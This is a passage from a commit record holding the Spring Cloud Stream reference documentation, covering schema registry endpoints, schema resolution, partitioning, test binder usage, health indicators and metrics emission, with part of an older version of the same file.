`\/schemas\/{id}` endpoint.\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-deleting-schema-subject-format-version]]\n===== Deleting a Schema by Subject, Format, and Version\n\nTo delete a schema identified by its subject, format, and version, send a `DELETE` request to the `\/{subject}\/{format}\/{version}` endpoint.\n\n[[spring-cloud-stream-overview-deleting-schema-id]]\n===== Deleting a Schema by ID\n\nTo delete a schema by its ID, send a `DELETE` request to the `\/schemas\/{id}` endpoint.\n\n[[spring-cloud-stream-overview-deleting-schema-subject]]\n===== Deleting a Schema by Subject\n`DELETE \/{subject}`\n\nDelete existing schemas by their subject.\n\nNOTE: This note applies to users of Spring Cloud Stream 1.1.0.RELEASE only.\nSpring Cloud Stream 1.1.0.RELEASE used the table name, `schema`, for storing `Schema` objects. `Schema` is a keyword in a number of database implementations.\nTo avoid any conflicts in the future, starting with 1.1.1.RELEASE, we have opted for the name `SCHEMA_REPOSITORY` for the storage table.\nAny Spring Cloud Stream 1.1.0.RELEASE users who upgrade should migrate their existing schemas to the new table before upgrading.\n\n==== Using Confluent's Schema Registry\n\nThe default configuration creates a `DefaultSchemaRegistryClient` bean.\nIf you want to use the Confluent schema registry, you need to create a bean of type `ConfluentSchemaRegistryClient`, which supersedes the one configured by default by the framework. The following example shows how to create such a bean:\n\n[source,java]\n----\n@Bean\npublic SchemaRegistryClient schemaRegistryClient(@Value(\"${spring.cloud.stream.schemaRegistryClient.endpoint}\") String endpoint){\n ConfluentSchemaRegistryClient client = new ConfluentSchemaRegistryClient();\n client.setEndpoint(endpoint);\n return client;\n}\n----\nNOTE: The ConfluentSchemaRegistryClient is tested against Confluent platform version 4.0.0.\n\n=== Schema Registration and Resolution\n\nTo better understand how Spring Cloud Stream registers and resolves new schemas and its use of Avro schema comparison features, we provide two separate subsections:\n\n* \"`<<spring-cloud-stream-overview-schema-registration-process>>`\"\n* \"`<<spring-cloud-stream-overview-schema-resolution-process>>`\"\n\n[[spring-cloud-stream-overview-schema-registration-process]]\n==== Schema Registration Process (Serialization)\n\nThe first part of the registration process is extracting a schema from the payload that is being sent over a channel.\nAvro types such as `SpecificRecord` or `GenericRecord` already contain a schema, which can be retrieved immediately from the instance.\nIn the case of POJOs, a schema is inferred if the `spring.cloud.stream.schema.avro.dynamicSchemaGenerationEnabled` property is set to `true` (the default).\n\n.Schema Writer Resolution Process\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/schema_resolution.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nOnes a schema is obtained, the converter loads its metadata (version) from the remote server.\nFirst, it queries a local cache. If no result is found, it submits the data to the server, which replies with versioning information.\nThe converter always caches the results to avoid the overhead of querying the Schema Server for every new message that needs to be serialized.\n\n.Schema Registration Process\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/registration.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nWith the schema version information, the converter sets the `contentType` header of the message to carry the version information -- for example: `application\/vnd.user.v1+avro`.\n\n[[spring-cloud-stream-overview-schema-resolution-process]]\n==== Schema Resolution Process (Deserialization)\n\nWhen reading messages that contain version information (that is, a `contentType` header with a scheme like the one described under \"`<<spring-cloud-stream-overview-schema-registration-process>>`\"), the converter queries the Schema server to fetch the writer schema of the message.\nOnce it has found the correct schema of the incoming message, it retrieves the reader schema and, by using Avro's schema resolution support, reads it into the reader definition (setting defaults and any missing properties).\n\n.Schema Reading Resolution Process\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/schema_reading.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nNOTE: You should understand the difference between a writer schema (the application that wrote the message) and a reader schema (the receiving application).\nWe suggest taking a moment to read https:\/\/avro.apache.org\/docs\/1.7.6\/spec.html[the Avro terminology] and understand the process.\nSpring Cloud Stream always fetches the writer schema to determine how to read a message.\nIf you want to get Avro's schema evolution support working, you need to make sure that a `readerSchema` was properly set for your application.\n\n== Inter-Application Communication\n\nSpring Cloud Stream enables communication between applications. Inter-application communication is a complex issue spanning several concerns, as described in the following topics:\n\n* \"`<<spring-cloud-stream-overview-connecting-multiple-application-instances>>`\"\n* \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\"\n* \"`<<spring-cloud-stream-overview-partitioning>>`\"\n\n[[spring-cloud-stream-overview-connecting-multiple-application-instances]]\n=== Connecting Multiple Application Instances\n\nWhile Spring Cloud Stream makes it easy for individual Spring Boot applications to connect to messaging systems, the typical scenario for Spring Cloud Stream is the creation of multi-application pipelines, where microservice applications send data to each other.\nYou can achieve this scenario by correlating the input and output destinations of \"`adjacent`\" applications.\n\nSuppose a design calls for the Time Source application to send data to the Log Sink application. You could use a common destination named `ticktock` for bindings within both applications.\n\nTime Source (that has the channel name `output`) would set the following property:\n\n----\nspring.cloud.stream.bindings.output.destination=ticktock\n----\n\nLog Sink (that has the channel name `input`) would set the following property:\n\n----\nspring.cloud.stream.bindings.input.destination=ticktock\n----\n\n[[spring-cloud-stream-overview-instance-index-instance-count]]\n=== Instance Index and Instance Count\n\nWhen scaling up Spring Cloud Stream applications, each instance can receive information about how many other instances of the same application exist and what its own instance index is.\nSpring Cloud Stream does this through the `spring.cloud.stream.instanceCount` and `spring.cloud.stream.instanceIndex` properties.\nFor example, if there are three instances of a HDFS sink application, all three instances have `spring.cloud.stream.instanceCount` set to `3`, and the individual applications have `spring.cloud.stream.instanceIndex` set to `0`, `1`, and `2`, respectively.\n\nWhen Spring Cloud Stream applications are deployed through Spring Cloud Data Flow, these properties are configured automatically; when Spring Cloud Stream applications are launched independently, these properties must be set correctly.\nBy default, `spring.cloud.stream.instanceCount` is `1`, and `spring.cloud.stream.instanceIndex` is `0`.\n\nIn a scaled-up scenario, correct configuration of these two properties is important for addressing partitioning behavior (see below) in general, and the two properties are always required by certain binders (for example, the Kafka binder) in order to ensure that data are split correctly across multiple consumer instances.\n\n[[spring-cloud-stream-overview-partitioning]]\n=== Partitioning\n\nPartitioning in Spring Cloud Stream consists of two tasks:\n\n* \"`<<spring-cloud-stream-overview-configuring-output-bindings-partitioning>>`\"\n* \"`<<spring-cloud-stream-overview-configuring-input-bindings-partitioning>>`\"\n\n[[spring-cloud-stream-overview-configuring-output-bindings-partitioning]]\n==== Configuring Output Bindings for Partitioning\n\nYou can configure an output binding to send partitioned data by setting one and only one of its `partitionKeyExpression` or `partitionKeyExtractorName` properties, as well as its `partitionCount` property.\n\nFor example, the following is a valid and typical configuration:\n\n----\nspring.cloud.stream.bindings.output.producer.partitionKeyExpression=payload.id\nspring.cloud.stream.bindings.output.producer.partitionCount=5\n----\n\nBased on that example configuration, data is sent to the target partition by using the following logic.\n\nA partition key's value is calculated for each message sent to a partitioned output channel based on the `partitionKeyExpression`.\nThe `partitionKeyExpression` is a SpEL expression that is evaluated against the outbound message for extracting the partitioning key.\n\nIf a SpEL expression is not sufficient for your needs, you can instead calculate the partition key value by providing an implementation of `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` and configuring it as a bean (by using the `@Bean` annotation).\nIf you have more then one bean of type `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` available in the Application Context, you can further filter it by specifying its name with the `partitionKeyExtractorName` property, as shown in the following example:\n\n[source]\n----\n--spring.cloud.stream.bindings.output.producer.partitionKeyExtractorName=customPartitionKeyExtractor\n--spring.cloud.stream.bindings.output.producer.partitionCount=5\n. . .\n@Bean\npublic CustomPartitionKeyExtractorClass customPartitionKeyExtractor() {\n return new CustomPartitionKeyExtractorClass();\n}\n----\n\nNOTE: In previous versions of Spring Cloud Stream, you could specify the implementation of `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` by setting the `spring.cloud.stream.bindings.output.producer.partitionKeyExtractorClass` property.\nSince version 2.0, this property is deprecated, and support for it will be removed in a future version.\n\nOnce the message key is calculated, the partition selection process determines the target partition as a value between `0` and `partitionCount - 1`.\nThe default calculation, applicable in most scenarios, is based on the following formula: `key.hashCode() % partitionCount`.\nThis can be customized on the binding, either by setting a SpEL expression to be evaluated against the 'key' (through the `partitionSelectorExpression` property) or by configuring an implementation of `org.springframework.cloud.stream.binder.PartitionSelectorStrategy` as a bean (by using the @Bean annotation).\nSimilar to the `PartitionKeyExtractorStrategy`, you can further filter it by using the `spring.cloud.stream.bindings.output.producer.partitionSelectorName` property when more than one bean of this type is available in the Application Context, as shown in the following example:\n\n[source]\n----\n--spring.cloud.stream.bindings.output.producer.partitionSelectorName=customPartitionSelector\n. . .\n@Bean\npublic CustomPartitionSelectorClass customPartitionSelector() {\n return new CustomPartitionSelectorClass();\n}\n----\n\nNOTE: In previous versions of Spring Cloud Stream you could specify the implementation of `org.springframework.cloud.stream.binder.PartitionSelectorStrategy` by setting the `spring.cloud.stream.bindings.output.producer.partitionSelectorClass` property.\nSince version 2.0, this property is deprecated and support for it will be removed in a future version.\n\n[[spring-cloud-stream-overview-configuring-input-bindings-partitioning]]\n==== Configuring Input Bindings for Partitioning\n\nAn input binding (with the channel name `input`) is configured to receive partitioned data by setting its `partitioned` property, as well as the `instanceIndex` and `instanceCount` properties on the application itself, as shown in the following example:\n\n----\nspring.cloud.stream.bindings.input.consumer.partitioned=true\nspring.cloud.stream.instanceIndex=3\nspring.cloud.stream.instanceCount=5\n----\n\nThe `instanceCount` value represents the total number of application instances between which the data should be partitioned.\nThe `instanceIndex` must be a unique value across the multiple instances, with a value between `0` and `instanceCount - 1`.\nThe instance index helps each application instance to identify the unique partition(s) from which it receives data.\nIt is required by binders using technology that does not support partitioning natively.\nFor example, with RabbitMQ, there is a queue for each partition, with the queue name containing the instance index.\nWith Kafka, if `autoRebalanceEnabled` is `true` (default), Kafka takes care of distributing partitions across instances, and these properties are not required.\nIf `autoRebalanceEnabled` is set to false, the `instanceCount` and `instanceIndex` are used by the binder to determine which partition(s) the instance subscribes to (you must have at least as many partitions as there are instances).\nThe binder allocates the partitions instead of Kafka.\nThis might be useful if you want messages for a particular partition to always go to the same instance.\nWhen a binder configuration requires them, it is important to set both values correctly in order to ensure that all of the data is consumed and that the application instances receive mutually exclusive datasets.\n\nWhile a scenario in which using multiple instances for partitioned data processing may be complex to set up in a standalone case, Spring Cloud Dataflow can simplify the process significantly by populating both the input and output values correctly and by letting you rely on the runtime infrastructure to provide information about the instance index and instance count.\n\n== Testing\n\nSpring Cloud Stream provides support for testing your microservice applications without connecting to a messaging system.\nYou can do that by using the `TestSupportBinder` provided by the `spring-cloud-stream-test-support` library, which can be added as a test dependency to the application, as shown in the following example:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-test-support<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n----\n\nNOTE: The `TestSupportBinder` uses the Spring Boot autoconfiguration mechanism to supersede the other binders found on the classpath.\nTherefore, when adding a binder as a dependency, you must make sure that the `test` scope is being used.\n\nThe `TestSupportBinder` lets you interact with the bound channels and inspect any messages sent and received by the application.\n\nFor outbound message channels, the `TestSupportBinder` registers a single subscriber and retains the messages emitted by the application in a `MessageCollector`.\nThey can be retrieved during tests and have assertions made against them.\n\nYou can also send messages to inbound message channels so that the consumer application can consume the messages.\nThe following example shows how to test both input and output channels on a processor:\n\n[source,java]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment= SpringBootTest.WebEnvironment.RANDOM_PORT)\npublic class ExampleTest {\n\n @Autowired\n private Processor processor;\n\n @Autowired\n private MessageCollector messageCollector;\n\n @Test\n @SuppressWarnings(\"unchecked\")\n public void testWiring() {\n Message<String> message = new GenericMessage<>(\"hello\");\n processor.input().send(message);\n Message<String> received = (Message<String>) messageCollector.forChannel(processor.output()).poll();\n assertThat(received.getPayload(), equalTo(\"hello world\"));\n }\n\n\n @SpringBootApplication\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Autowired\n private Processor channels;\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n}\n----\n\nIn the preceding example, we create an application that has an input channel and an output channel, both bound through the `Processor` interface.\nThe bound interface is injected into the test so that we can have access to both channels.\nWe send a message on the input channel, and we use the `MessageCollector` provided by Spring Cloud Stream's test support to capture that the message has been sent to the output channel as a result.\nOnce we have received the message, we can validate that the component functions correctly.\n\n=== Disabling the Test Binder Autoconfiguration\n\nThe intent behind the test binder superseding all the other binders on the classpath is to make it easy to test your applications without making changes to your production dependencies.\nIn some cases (for example, integration tests) it is useful to use the actual production binders instead, and that requires disabling the test binder autoconfiguration.\nTo do so, you can exclude the `org.springframework.cloud.stream.test.binder.TestSupportBinderAutoConfiguration` class by using one of the Spring Boot autoconfiguration exclusion mechanisms, as shown in the following example:\n\n[source,java]\n----\n @SpringBootApplication(exclude = TestSupportBinderAutoConfiguration.class)\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n----\n\nWhen autoconfiguration is disabled, the test binder is available on the classpath, and its `defaultCandidate` property is set to `false` so that it does not interfere with the regular user configuration. It can be referenced under the name, `test`, as shown in the following example:\n\n`spring.cloud.stream.defaultBinder=test`\n\n== Health Indicator\n\nSpring Cloud Stream provides a health indicator for binders.\nIt is registered under the name `binders` and can be enabled or disabled by setting the `management.health.binders.enabled` property.\n\nTo enable health check you first need to enable both \"web\" and \"actuator\" by including its dependencies (see <<spring-cloud-stream-preface-actuator-web-dependencies>>)\n\nIf `management.health.binders.enabled` is not set explicitly by the application, then `management.health.defaults.enabled` is matched as `true` and the binder health indicators are enabled.\nIf you want to disable health indicator completely, then you have to set `management.health.binders.enabled` to `false`.\n\nYou can use Spring Boot actuator health endpoint to access the health indicator - `\/actuator\/health`.\nBy default, you will only receive the top level application status when you hit the above endpoint.\nIn order to receive the full details from the binder specific health indicators, you need to include the property `management.endpoint.health.show-details` with the value `ALWAYS` in your application.\n\nHealth indicators are binder-specific and certain binder implementations may not necessarily provide a health indicator.\n\nIf you want to completely disable all health indicators available out of the box and instead provide your own health indicators,\nyou can do so by setting property `management.health.binders.enabled` to `false` and then provide your own `HealthIndicator` beans in your application.\nIn this case, the health indicator infrastructure from Spring Boot will still pick up these custom beans.\nEven if you are not disabling the binder health indicators, you can still enhance the health checks by providing your own `HealthIndicator` beans in addition to the out of the box health checks.\n\nWhen you have multiple binders in the same application, health indicators are enabled by default unless the application turns them off by setting `management.health.binders.enabled` to `false`.\nIn this case, if the user wants to disable health check for a subset of the binders, then that should be done by setting `management.health.binders.enabled` to `false` in the multi binder configurations's environment.\nSee <<multiple-systems,Connecting to Multiple Systems>> for details on how environment specific properties can be provided.\n\n\n[[spring-cloud-stream-overview-metrics-emitter]]\n== Metrics Emitter\n\nSpring Boot Actuator provides dependency management and auto-configuration for https:\/\/micrometer.io\/[Micrometer], an application metrics\nfacade that supports numerous https:\/\/docs.spring.io\/spring-boot\/docs\/2.0.0.RELEASE\/reference\/htmlsingle\/#production-ready-metrics[monitoring systems].\n\nSpring Cloud Stream provides support for emitting any available micrometer-based metrics to a binding destination, allowing for periodic\ncollection of metric data from stream applications without relying on polling individual endpoints.\n\nMetrics Emitter is activated by defining the `spring.cloud.stream.bindings.applicationMetrics.destination` property,\nwhich specifies the name of the binding destination used by the current binder to publish metric messages.\n\nFor example:\n[source,java]\n----\nspring.cloud.stream.bindings.applicationMetrics.destination=myMetricDestination\n----\nThe preceding example instructs the binder to bind to `myMetricDestination` (that is, Rabbit exchange, Kafka topic, and others).\n\nThe following properties can be used for customizing the emission of metrics:\n\nspring.cloud.stream.metrics.key::\nThe name of the metric being emitted. Should be a unique value per application.\n+\nDefault: `${spring.application.name:${vcap.application.name:${spring.config.name:application}}}`\n+\nspring.cloud.stream.metrics.properties::\nAllows white listing application properties that are added to the metrics payload\n+\nDefault: null.\n+\nspring.cloud.stream.metrics.meter-filter::\nPattern to control the 'meters' one wants to capture.\nFor example, specifying `spring.integration.*` captures metric information for meters whose name starts with `spring.integration.`\n+\nDefault: all 'meters' are captured.\n+\nspring.cloud.stream.metrics.schedule-interval::\nInterval to control the rate of publishing metric data.\n+\nDefault: 1 min\n\nConsider the following:\n\n[source,bash]\n----\njava -jar time-source.jar \\\n --spring.cloud.stream.bindings.applicationMetrics.destination=someMetrics \\\n --spring.cloud.stream.metrics.properties=spring.application** \\\n --spring.cloud.stream.metrics.meter-filter=spring.integration.*\n----\n\nThe following example shows the payload of the data published to the binding destination as a result of the preceding command:\n\n[source,javascript]\n----\n{\n\t\"name\": \"application\",\n\t\"createdTime\": \"2018-03-23T14:48:12.700Z\",\n\t\"properties\": {\n\t},\n\t\"metrics\": [\n\t\t{\n\t\t\t\"id\": {\n\t\t\t\t\"name\": \"spring.integration.send\",\n\t\t\t\t\"tags\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"exception\",\n\t\t\t\t\t\t\"value\": \"none\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"name\",\n\t\t\t\t\t\t\"value\": \"input\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"result\",\n\t\t\t\t\t\t\"value\": \"success\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"type\",\n\t\t\t\t\t\t\"value\": \"channel\"\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\t\"type\": \"TIMER\",\n\t\t\t\t\"description\": \"Send processing time\",\n\t\t\t\t\"baseUnit\": \"milliseconds\"\n\t\t\t},\n\t\t\t\"timestamp\": \"2018-03-23T14:48:12.697Z\",\n\t\t\t\"sum\": 130.340546,\n\t\t\t\"count\": 6,\n\t\t\t\"mean\": 21.72342433333333,\n\t\t\t\"upper\": 116.176299,\n\t\t\t\"total\": 130.340546\n\t\t}\n\t]\n}\n----\n\nNOTE: Given that the format of the Metric message has slightly changed after migrating to Micrometer, the published message will also have\na `STREAM_CLOUD_STREAM_VERSION` header set to `2.x` to help distinguish between Metric messages from the older versions of the Spring Cloud Stream.\n\n== Samples\n\nFor Spring Cloud Stream samples, see the https:\/\/github.com\/spring-cloud\/spring-cloud-stream-samples[spring-cloud-stream-samples] repository on GitHub.\n\n=== Deploying Stream Applications on CloudFoundry\n\nOn CloudFoundry, services are usually exposed through a special environment variable called https:\/\/docs.cloudfoundry.org\/devguide\/deploy-apps\/environment-variable.html#VCAP-SERVICES[VCAP_SERVICES].\n\nWhen configuring your binder connections, you can use the values from an environment variable as explained on the http:\/\/docs.spring.io\/spring-cloud-dataflow-server-cloudfoundry\/docs\/current-SNAPSHOT\/reference\/htmlsingle\/#getting-started-ups[dataflow Cloud Foundry Server] docs.","old_contents":"\/\/ Do not edit this file (e.g. go instead to src\/main\/asciidoc)\n\n:github-tag: master\n:github-repo: spring-cloud\/spring-cloud-stream\n:github-raw: https:\/\/raw.githubusercontent.com\/{github-repo}\/{github-tag}\n:github-code: https:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n:toclevels: 8\n:nofooter:\n:sectlinks: true\n\n[partintro]\n--\nThis section goes into more detail about how you can work with Spring Cloud Stream.\nIt covers topics such as creating and running stream applications.\n--\n\n[[spring-cloud-stream-overview-introducing]]\n== Introducing Spring Cloud Stream\n\nSpring Cloud Stream is a framework for building message-driven microservice applications.\nSpring Cloud Stream builds upon Spring Boot to create standalone, production-grade Spring applications and uses Spring Integration to provide connectivity to message brokers.\nIt provides opinionated configuration of middleware from several vendors, introducing the concepts of persistent publish-subscribe semantics, consumer groups, and partitions.\n\nYou can add the `@EnableBinding` annotation to your application to get immediate connectivity to a message broker, and you can add `@StreamListener` to a method to cause it to receive events for stream processing.\nThe following example shows a sink application that receives external messages:\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Sink.class)\npublic class VoteRecordingSinkApplication {\n\n public static void main(String[] args) {\n SpringApplication.run(VoteRecordingSinkApplication.class, args);\n }\n\n @StreamListener(Sink.INPUT)\n public void processVote(Vote vote) {\n votingService.recordVote(vote);\n }\n}\n----\n\nThe `@EnableBinding` annotation takes one or more interfaces as parameters (in this case, the parameter is a single `Sink` interface).\nAn interface declares input and output channels.\nSpring Cloud Stream provides the `Source`, `Sink`, and `Processor` interfaces. You can also define your own interfaces.\n\nThe following listing shows the definition of the `Sink` interface:\n\n[source,java]\n----\npublic interface Sink {\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\nThe `@Input` annotation identifies an input channel, through which received messages enter the application.\nThe `@Output` annotation identifies an output channel, through which published messages leave the application.\nThe `@Input` and `@Output` annotations can take a channel name as a parameter.\nIf a name is not provided, the name of the annotated method is used.\n\nSpring Cloud Stream creates an implementation of the interface for you.\nYou can use this in the application by autowiring it, as shown in the following example (from a test case):\n\n[source,java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = VoteRecordingSinkApplication.class)\n@WebAppConfiguration\n@DirtiesContext\npublic class StreamApplicationTests {\n\n @Autowired\n private Sink sink;\n\n @Test\n public void contextLoads() {\n assertNotNull(this.sink.input());\n }\n}\n----\n\n== Main Concepts\n\nSpring Cloud Stream provides a number of abstractions and primitives that simplify the writing of message-driven microservice applications.\nThis section gives an overview of the following:\n\n* <<spring-cloud-stream-overview-application-model,Spring Cloud Stream's application model>>\n* <<spring-cloud-stream-overview-binder-abstraction>>\n* <<spring-cloud-stream-overview-persistent-publish-subscribe-support,Persistent publish-subscribe support>>\n* <<consumer-groups,Consumer group support>>\n* <<partitioning,Partitioning support>>\n* <<spring-cloud-stream-overview-binder-api,A pluggable Binder SPI>>\n\n[[spring-cloud-stream-overview-application-model]]\n=== Application Model\n\nA Spring Cloud Stream application consists of a middleware-neutral core.\nThe application communicates with the outside world through input and output channels injected into it by Spring Cloud Stream.\nChannels are connected to external brokers through middleware-specific Binder implementations.\n\n.Spring Cloud Stream Application\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-with-binder.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\n==== Fat JAR\n\nSpring Cloud Stream applications can be run in stand-alone mode from your IDE for testing.\nTo run a Spring Cloud Stream application in production, you can create an executable (or \"`fat`\") JAR by using the standard Spring Boot tooling provided for Maven or Gradle. See the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/howto-build.html#howto-create-an-executable-jar-with-maven[Spring Boot Reference Guide] for more details.\n\n[[spring-cloud-stream-overview-binder-abstraction]]\n=== The Binder Abstraction\n\nSpring Cloud Stream provides Binder implementations for https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-kafka[Kafka] and https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-rabbit[Rabbit MQ].\nSpring Cloud Stream also includes a https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/blob\/master\/spring-cloud-stream-test-support\/src\/main\/java\/org\/springframework\/cloud\/stream\/test\/binder\/TestSupportBinder.java[TestSupportBinder], which leaves a channel unmodified so that tests can interact with channels directly and reliably assert on what is received.\nYou can also use the extensible API to write your own Binder.\n\nSpring Cloud Stream uses Spring Boot for configuration, and the Binder abstraction makes it possible for a Spring Cloud Stream application to be flexible in how it connects to middleware.\nFor example, deployers can dynamically choose, at runtime, the destinations (such as the Kafka topics or RabbitMQ exchanges) to which channels connect.\nSuch configuration can be provided through external configuration properties and in any form supported by Spring Boot (including application arguments, environment variables, and `application.yml` or `application.properties` files).\nIn the sink example from the <<spring-cloud-stream-overview-introducing>> section, setting the `spring.cloud.stream.bindings.input.destination` application property to `raw-sensor-data` causes it to read from the `raw-sensor-data` Kafka topic or from a queue bound to the `raw-sensor-data` RabbitMQ exchange.\n\nSpring Cloud Stream automatically detects and uses a binder found on the classpath.\nYou can use different types of middleware with the same code.\nTo do so, include a different binder at build time.\nFor more complex use cases, you can also package multiple binders with your application and have it choose the binder( and even whether to use different binders for different channels) at runtime.\n\n[[spring-cloud-stream-overview-persistent-publish-subscribe-support]]\n=== Persistent Publish-Subscribe Support\n\nCommunication between applications follows a publish-subscribe model, where data is broadcast through shared topics.\nThis can be seen in the following figure, which shows a typical deployment for a set of interacting Spring Cloud Stream applications.\n\n.Spring Cloud Stream Publish-Subscribe\nimage::SCSt-sensors.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nData reported by sensors to an HTTP endpoint is sent to a common destination named `raw-sensor-data`.\nFrom the destination, it is independently processed by a microservice application that computes time-windowed averages and by another microservice application that ingests the raw data into HDFS (Hadoop Distributed File System).\nIn order to process the data, both applications declare the topic as their input at runtime.\n\nThe publish-subscribe communication model reduces the complexity of both the producer and the consumer and lets new applications be added to the topology without disruption of the existing flow.\nFor example, downstream from the average-calculating application, you can add an application that calculates the highest temperature values for display and monitoring.\nYou can then add another application that interprets the same flow of averages for fault detection.\nDoing all communication through shared topics rather than point-to-point queues reduces coupling between microservices.\n\nWhile the concept of publish-subscribe messaging is not new, Spring Cloud Stream takes the extra step of making it an opinionated choice for its application model.\nBy using native middleware support, Spring Cloud Stream also simplifies use of the publish-subscribe model across different platforms.\n\n[[consumer-groups]]\n=== Consumer Groups\nWhile the publish-subscribe model makes it easy to connect applications through shared topics, the ability to scale up by creating multiple instances of a given application is equally important.\nWhen doing so, different instances of an application are placed in a competing consumer relationship, where only one of the instances is expected to handle a given message.\n\nSpring Cloud Stream models this behavior through the concept of a consumer group.\n(Spring Cloud Stream consumer groups are similar to and inspired by Kafka consumer groups.)\nEach consumer binding can use the `spring.cloud.stream.bindings.<channelName>.group` property to specify a group name.\nFor the consumers shown in the following figure, this property would be set as `spring.cloud.stream.bindings.<channelName>.group=hdfsWrite` or `spring.cloud.stream.bindings.<channelName>.group=average`.\n\n.Spring Cloud Stream Consumer Groups\nimage::SCSt-groups.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nAll groups that subscribe to a given destination receive a copy of published data, but only one member of each group receives a given message from that destination.\nBy default, when a group is not specified, Spring Cloud Stream assigns the application to an anonymous and independent single-member consumer group that is in a publish-subscribe relationship with all other consumer groups.\n\n[[consumer-types]]\n=== Consumer Types\n\nTwo types of consumer are supported:\n\n* Message-driven (sometimes referred to as Asynchronous)\n* Polled (sometimes referred to as Synchronous)\n\nPrior to version 2.0, only asynchronous consumers were supported. A message is delivered as soon as it is available and a thread is available to process it.\n\nWhen you wish to control the rate at which messages are processed, you might want to use a synchronous consumer.\n\/\/ TODO This needs more description. A sentence parallel to the last sentence of the preceding paragraph would help.\n\n[[durability]]\n==== Durability\n\nConsistent with the opinionated application model of Spring Cloud Stream, consumer group subscriptions are durable.\nThat is, a binder implementation ensures that group subscriptions are persistent and that, once at least one subscription for a group has been created, the group receives messages, even if they are sent while all applications in the group are stopped.\n\n[NOTE]\n====\nAnonymous subscriptions are non-durable by nature.\nFor some binder implementations (such as RabbitMQ), it is possible to have non-durable group subscriptions.\n====\n\nIn general, it is preferable to always specify a consumer group when binding an application to a given destination.\nWhen scaling up a Spring Cloud Stream application, you must specify a consumer group for each of its input bindings.\nDoing so prevents the application's instances from receiving duplicate messages (unless that behavior is desired, which is unusual).\n\n[[partitioning]]\n=== Partitioning Support\n\nSpring Cloud Stream provides support for partitioning data between multiple instances of a given application.\nIn a partitioned scenario, the physical communication medium (such as the broker topic) is viewed as being structured into multiple partitions.\nOne or more producer application instances send data to multiple consumer application instances and ensure that data identified by common characteristics are processed by the same consumer instance.\n\nSpring Cloud Stream provides a common abstraction for implementing partitioned processing use cases in a uniform fashion.\nPartitioning can thus be used whether the broker itself is naturally partitioned (for example, Kafka) or not (for example, RabbitMQ).\n\n.Spring Cloud Stream Partitioning\nimage::SCSt-partitioning.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nPartitioning is a critical concept in stateful processing, where it is critical (for either performance or consistency reasons) to ensure that all related data is processed together.\nFor example, in the time-windowed average calculation example, it is important that all measurements from any given sensor are processed by the same application instance.\n\nNOTE: To set up a partitioned processing scenario, you must configure both the data-producing and the data-consuming ends.\n\n== Programming Model\n\nTo understand the programming model, you should be familiar with the following core concepts:\n\n* *Destination Binders:* Components responsible to provide integration with the external messaging systems.\n* *Destination Bindings:* Bridge between the external messaging systems and application provided _Producers_ and _Consumers_ of messages (created by the Destination Binders).\n* *Message:* The canonical data structure used by producers and consumers to communicate with Destination Binders (and thus other applications via external messaging systems).\n\nimage::SCSt-overview.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\n=== Destination Binders\n\nDestination Binders are extension components of Spring Cloud Stream responsible for providing the necessary configuration and implementation to facilitate\nintegration with external messaging systems.\nThis integration is responsible for connectivity, delegation, and routing of messages to and from producers and consumers, data type conversion,\ninvocation of the user code, and more.\n\nBinders handle a lot of the boiler plate responsibilities that would otherwise fall on your shoulders. However, to accomplish that, the binder still needs\nsome help in the form of minimalistic yet required set of instructions from the user, which typically come in the form of some type of configuration.\n\nWhile it is out of scope of this section to discuss all of the available binder and binding configuration options (the rest of the manual covers them extensively),\n_Destination Binding_ does require special attention. The next section discusses it in detail.\n\n=== Destination Bindings\n\nAs stated earlier, _Destination Bindings_ provide a bridge between the external messaging system and application-provided _Producers_ and _Consumers_.\n\nApplying the @EnableBinding annotation to one of the application\u2019s configuration classes defines a destination binding.\nThe `@EnableBinding` annotation itself is meta-annotated with `@Configuration` and triggers the configuration of the Spring Cloud Stream infrastructure.\n\nThe following example shows a fully configured and functioning Spring Cloud Stream application that receives the payload of the message from the `INPUT`\ndestination as a `String` type (see <<Content Type Negotiation>> section), logs it to the console and sends it to the `OUTPUT` destination after converting it to 